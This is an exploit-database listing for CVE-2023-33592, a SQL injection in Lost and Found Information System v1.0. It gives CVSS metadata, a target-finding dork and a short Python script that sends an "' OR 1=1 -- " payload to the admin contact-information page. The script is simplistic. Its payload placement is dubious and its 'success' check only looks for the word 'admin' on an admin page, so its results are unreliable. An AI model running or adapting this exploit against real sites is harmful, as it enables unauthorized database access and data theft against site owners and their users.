Lost and Found Information System v1.0 - SQL Injection Exploit

2023-07-0600:00:00

Amirhossein Bahramizadeh

0day.today

114

exploit

sql injection

web application

vulnerability

iran

cve-2023-33592

windows

linux

amirhossein bahramizadeh

requests library

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.002

Percentile

57.7%

JSON

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")